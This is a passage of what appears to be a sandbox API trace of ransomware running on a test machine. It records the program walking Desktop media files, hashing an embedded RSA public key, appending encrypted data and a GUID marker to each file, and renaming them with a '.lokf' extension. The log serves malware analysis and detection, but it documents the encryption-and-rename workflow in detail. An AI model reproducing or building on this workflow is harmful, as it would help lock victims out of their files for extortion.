lpOverlapped=0x0) returned 1 [0058.718] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.718] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.718] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.719] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.719] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0058.719] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.719] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.719] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.719] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.719] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.719] GetLastError () returned 0x0 [0058.719] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.719] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0058.719] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.719] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.720] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.720] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.720] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.720] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0058.720] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x11d98, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.720] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.721] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.721] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.721] CloseHandle (hObject=0x5cc) returned 1 [0058.722] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc70 [0058.722] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x870) returned 0x3268798 [0058.722] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\U7Qf8.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\u7qf8.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\U7Qf8.mp4.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\u7qf8.mp4.lokf")) returned 1 [0058.723] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcbeda60, ftCreationTime.dwHighDateTime=0x1d4c9a5, ftLastAccessTime.dwLowDateTime=0x429e60b0, ftLastAccessTime.dwHighDateTime=0x1d4cf86, ftLastWriteTime.dwLowDateTime=0x429e60b0, ftLastWriteTime.dwHighDateTime=0x1d4cf86, nFileSizeHigh=0x0, nFileSizeLow=0x157dc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vXRE_K.mp3", cAlternateFileName="")) returned 1 [0058.723] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0058.723] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0058.723] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vXRE_K.mp3") returned=".mp3" [0058.723] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vXRE_K.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vxre_k.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.723] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=88028) returned 1 [0058.723] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.725] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x157b6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.725] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.726] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.726] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x157dc, lpOverlapped=0x0) returned 1 [0058.726] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.726] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.726] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.726] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.726] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0058.727] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.727] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.727] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.727] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.727] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.727] GetLastError () returned 0x0 [0058.727] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.727] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0058.727] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.727] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.727] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.727] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.728] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.728] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0058.728] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x157dc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.728] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.728] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.728] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.728] CloseHandle (hObject=0x5cc) returned 1 [0058.729] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269658 [0058.729] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x870) returned 0x3268798 [0058.729] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vXRE_K.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vxre_k.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vXRE_K.mp3.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vxre_k.mp3.lokf")) returned 1 [0058.731] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0c201d0, ftCreationTime.dwHighDateTime=0x1d4c904, ftLastAccessTime.dwLowDateTime=0x42cadd20, ftLastAccessTime.dwHighDateTime=0x1d4cb8f, ftLastWriteTime.dwLowDateTime=0x42cadd20, ftLastWriteTime.dwHighDateTime=0x1d4cb8f, nFileSizeHigh=0x0, nFileSizeLow=0xe7b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xJT0OcisPj-xq.jpg", cAlternateFileName="XJT0OC~1.JPG")) returned 1 [0058.731] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0058.731] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0058.731] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJT0OcisPj-xq.jpg") returned=".jpg" [0058.731] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJT0OcisPj-xq.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xjt0ocispj-xq.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.731] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=59314) returned 1 [0058.731] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.733] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xe78c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.733] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.733] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.733] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xe7b2, lpOverlapped=0x0) returned 1 [0058.734] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.734] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.734] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.734] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.734] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0058.734] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.734] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.734] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.734] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.734] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.734] GetLastError () returned 0x0 [0058.734] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.735] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0058.735] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.735] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.735] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.735] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.735] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.735] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0058.735] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xe7b2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.735] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.736] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.736] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.736] CloseHandle (hObject=0x5cc) returned 1 [0058.736] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269658 [0058.736] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x880) returned 0x3268798 [0058.737] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJT0OcisPj-xq.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xjt0ocispj-xq.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJT0OcisPj-xq.jpg.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xjt0ocispj-xq.jpg.lokf")) returned 1 [0058.738] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x964ee260, ftCreationTime.dwHighDateTime=0x1d4d045, ftLastAccessTime.dwLowDateTime=0xfe86900, ftLastAccessTime.dwHighDateTime=0x1d4ca9e, ftLastWriteTime.dwLowDateTime=0xfe86900, ftLastWriteTime.dwHighDateTime=0x1d4ca9e, nFileSizeHigh=0x0, nFileSizeLow=0x366f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xrWMPRPigWwu3vXxOU1.wav", cAlternateFileName="XRWMPR~1.WAV")) returned 1 [0058.738] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0058.738] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8a50 [0058.738] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xrWMPRPigWwu3vXxOU1.wav") returned=".wav" [0058.738] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xrWMPRPigWwu3vXxOU1.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xrwmprpigwwu3vxxou1.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.738] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=13935) returned 1 [0058.738] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.740] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x3649, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.740] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.740] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.740] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x366f, lpOverlapped=0x0) returned 1 [0058.741] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.741] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.741] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.741] lstrlenA (lpString="-----BEGIN PUBLIC 